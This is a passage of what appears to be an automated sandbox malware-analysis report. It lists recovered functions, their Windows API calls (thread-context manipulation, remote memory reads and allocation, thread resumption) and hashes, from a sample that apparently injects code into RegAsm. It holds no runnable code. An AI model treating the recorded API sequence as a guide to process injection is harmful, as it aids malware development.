                                          • Executed
                                          • Not Executed
                                          control_flow_graph 296 15187c8-1518814 298 1518820-151884f Wow64SetThreadContext 296->298 299 1518816-151881e 296->299 300 1518851-1518857 298->300 301 1518858-1518879 298->301 299->298 300->301
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 01518842
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 5dfe2da8bbcd9a1e723a2fd4bba9b5b249968818cdbd141456b42b10034892bf
                                          • Instruction ID: ddcc3384883527408051cef4e726c2c90e213ea95f9cdd54b2cf272e619fbf4c
                                          • Opcode Fuzzy Hash: 5dfe2da8bbcd9a1e723a2fd4bba9b5b249968818cdbd141456b42b10034892bf
                                          • Instruction Fuzzy Hash: 2F2115B1D002599BDB10CF9AD885BDEFBF4FB48310F14812AD918A7240D378A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01518408 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 303 1518408-1518454 305 1518460-151848c Wow64GetThreadContext 303->305 306 1518456-151845e 303->306 307 1518495-15184b6 305->307 308 151848e-1518494 305->308 306->305 308->307
                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0151847F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 40ba7f9272bfd3b0b7fe296e998cdd1f87b34cbfceec9de646f79202c3a31b38
                                          • Instruction ID: 481f08f5d0b545c55c52dfc27d2e113c25666230a44db5efda03a0f147a829a9
                                          • Opcode Fuzzy Hash: 40ba7f9272bfd3b0b7fe296e998cdd1f87b34cbfceec9de646f79202c3a31b38
                                          • Instruction Fuzzy Hash: 0521F7B1D006199FDB14CF9AC585B9EFBF4FB48314F14812AD518A7240D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 015184C8 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 310 15184c8-151854b ReadProcessMemory 312 1518554-1518575 310->312 313 151854d-1518553 310->313 313->312
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0151853E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 8795e7e4e995d9a219c88f92336aee9dd5ec8d56a2bcbcc639bd7088d819a3b3
                                          • Instruction ID: 1603087bdcc4a36446932f419f77173bb4f1c7dfbc3efed9f3d7693ab917f470
                                          • Opcode Fuzzy Hash: 8795e7e4e995d9a219c88f92336aee9dd5ec8d56a2bcbcc639bd7088d819a3b3
                                          • Instruction Fuzzy Hash: B921C4B5900249DFDB10CF9AC985BDEBFF4FB48320F148429E918A7250D379A944DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 015185B8 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 315 15185b8-1518630 VirtualAllocEx 317 1518632-1518638 315->317 318 1518639-151864d 315->318 317->318
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01518623
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: e987967567b4dedc7d4181d455d58b366b2e08794a7ebf895f5110eb8529f268
                                          • Instruction ID: a8d5c998e8b155e48b8389b4f6221f941c9bb10d4d2827da80c34c68c41f8ea4
                                          • Opcode Fuzzy Hash: e987967567b4dedc7d4181d455d58b366b2e08794a7ebf895f5110eb8529f268
                                          • Instruction Fuzzy Hash: A81113B5800249DFDB20CF9AC884BDEBFF8FB48320F208419E518A7210C375A940CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01518890 Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 325 1518890-15188ff ResumeThread 327 1518901-1518907 325->327 328 1518908-151891c 325->328 327->328
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 015188F2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: ca4bb12effe51db31139c228650e2cd17c8451b5df8b3867e5afbbaff53fb9a2
                                          • Instruction ID: 41ad23be727809faaa521194afea8f6c6e06e4f8bf5cb25a7945cdf69f62b737
                                          • Opcode Fuzzy Hash: ca4bb12effe51db31139c228650e2cd17c8451b5df8b3867e5afbbaff53fb9a2
                                          • Instruction Fuzzy Hash: 2211F2B59002498FDB20CF9AD885B9EBFF8EB48324F208459D518A7240C375A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01518888 Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 320 1518888-15188ff ResumeThread 322 1518901-1518907 320->322 323 1518908-151891c 320->323 322->323
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 015188F2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1694919701.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1510000_bddddsx.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 7700b4f9e4aef4462ee6588106c1181aacf8107c04cf08f43e26cc5e4e2c1c60
                                          • Instruction ID: fbb528dd2f64bae800bf3d9d29c450486e91ea3442fb0b89f69470954da880ed
                                          • Opcode Fuzzy Hash: 7700b4f9e4aef4462ee6588106c1181aacf8107c04cf08f43e26cc5e4e2c1c60
                                          • Instruction Fuzzy Hash: 1D1110B59002498EDB24CF9AC585B9EBFF8EB48320F20845AD518B7250C3786944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02D80000 Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1695009997.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2d80000_bddddsx.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00c5385f34ad1c4f8ea6918cad2284c544d814506254d11cf2766bb0c1e0edcb
                                          • Instruction ID: 565b5b0acd20ff17af94767f6b536f620d59bc1b4242dcd416a45eea77e8c39d
                                          • Opcode Fuzzy Hash: 00c5385f34ad1c4f8ea6918cad2284c544d814506254d11cf2766bb0c1e0edcb
                                          • Instruction Fuzzy Hash: 4411D33165E3C04FE7834B3488A16C13FB1EF47715B2A05CBE680CB1A3D669AC0AD722
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 02E50901 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hhq
                                          • API String ID: 0-4210879014
                                          • Opcode ID: fd13826974fd3ca1550abfefbaf9fd299d6720fea7e45e74739dffcc713e4b1e
                                          • Instruction ID: 8d231061ad45fbab0dc48d7d6d3573a540f3e8c995b2a18e5aa2b95d9780e59f
                                          • Opcode Fuzzy Hash: fd13826974fd3ca1550abfefbaf9fd299d6720fea7e45e74739dffcc713e4b1e
                                          • Instruction Fuzzy Hash: 6621BE70E052088FCB98EFB8C5556AE7FF1AF84344F2484AED409EB295DB384D05CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E50BD8 Relevance: .2, Instructions: 205COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c9fc50a494199987e4bc1dd7e3bfe58278b3b2b976e4a4ebc7f5199f72fa037d
                                          • Instruction ID: 5d357ca0bdd66a7220380b322aa544ee48174d9ad5c80a698e8501f1e2e54193
                                          • Opcode Fuzzy Hash: c9fc50a494199987e4bc1dd7e3bfe58278b3b2b976e4a4ebc7f5199f72fa037d
                                          • Instruction Fuzzy Hash: BE7192707102158FCB58EF78D998A6E7BB2FFC8301B505928E506EB3A5DF349D058B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E50BC8 Relevance: .1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d01de818427fdaac5d20c8ab60e27b72eefa62398f6e2e2691943039c28d904
                                          • Instruction ID: 928160b160352c2164aab131ab27d71df74d4ba0945b77259c9854a85d47c71f
                                          • Opcode Fuzzy Hash: 3d01de818427fdaac5d20c8ab60e27b72eefa62398f6e2e2691943039c28d904
                                          • Instruction Fuzzy Hash: 32417FB17102058FCB58FF74E59866E7BA2FF982413406A3CD816A72A4EF389D458F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E51361 Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3889004ad9a70d887119d829cd68cda0e127c98c11c4cd6e0ef4ad1de59577b9
                                          • Instruction ID: 106cb28b682847efe44028ba77fc49882490aeae148ecbc5dc5c8b0eacf8b911
                                          • Opcode Fuzzy Hash: 3889004ad9a70d887119d829cd68cda0e127c98c11c4cd6e0ef4ad1de59577b9
                                          • Instruction Fuzzy Hash: C221C6B1B102155FCB04ABFD48583AF7ADAEFC8250B14943DD64ED7381DE349C0147A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E51249 Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d9c339dcfd7a03919451d83bf4fbcc062bad7c3117ebce52e56c7ac51b39b038
                                          • Instruction ID: 2a0de35e6aa8a5ea62ff2c367c4e2d88165fce02bb470817f74e93a723afafde
                                          • Opcode Fuzzy Hash: d9c339dcfd7a03919451d83bf4fbcc062bad7c3117ebce52e56c7ac51b39b038
                                          • Instruction Fuzzy Hash: 57312AB4E10209DFCB04EFB4D980AADBBB6FFC4304F109569E515A7350DB386A81DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E50CC2 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ece1079a2e613b03d23139623418fa23b6813fbf22dbcec5c81bae1a7c232621
                                          • Instruction ID: 1c91aed6d1b808eb86cff5bd4ca2cf7771e3407aa8e7e3195be889ac1130d728
                                          • Opcode Fuzzy Hash: ece1079a2e613b03d23139623418fa23b6813fbf22dbcec5c81bae1a7c232621
                                          • Instruction Fuzzy Hash: 3E21AE71700B114BCB68BFB994A412E7AE2BF84214350992DD42B9B794DF34AE049FA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E51258 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcef3a08aece4f7992a775c71b87e0c053cef223c74e436b9925f267cce76164
                                          • Instruction ID: 9a002bac0ece479f7d7696efaed0e8af7416757758536b73ce4aab0acbeaafa2
                                          • Opcode Fuzzy Hash: bcef3a08aece4f7992a775c71b87e0c053cef223c74e436b9925f267cce76164
                                          • Instruction Fuzzy Hash: 0F212CB4A10209DFCB04EFB4D9846AD7BB6FFC4304B109569E515A7350DB386A81CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E50838 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: feae579caaa0789691266207d9a58fb98ea5849a4792dca33f886e0570a222dc
                                          • Instruction ID: 2e9dcad86aec32a13f6da1ba50deb6482ad7db47ba62636259cbef33dd5cbca4
                                          • Opcode Fuzzy Hash: feae579caaa0789691266207d9a58fb98ea5849a4792dca33f886e0570a222dc
                                          • Instruction Fuzzy Hash: 4411F1F87001059FCB05EF14FA80A5537B5FBC4345B106ABCE404BB215DA7C6D869F81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02E50848 Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1720911964.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_2e50000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7c53a6177c5b0c9769ec8b8c46a3f009ad942c5b129b3bf3bcda7a529d717ca
                                          • Instruction ID: d2919582408aedb5b08b09964d8cb3947b5361858ba39a8946eb1200b7052ca4
                                          • Opcode Fuzzy Hash: e7c53a6177c5b0c9769ec8b8c46a3f009ad942c5b129b3bf3bcda7a529d717ca
                                          • Instruction Fuzzy Hash: BC019CF87001059FCB05EF18FA80A5577B5FBC4345B10AABCB404AB225DA7C6D459F82
                                          Uniqueness

                                          Uniqueness Score: -1.00%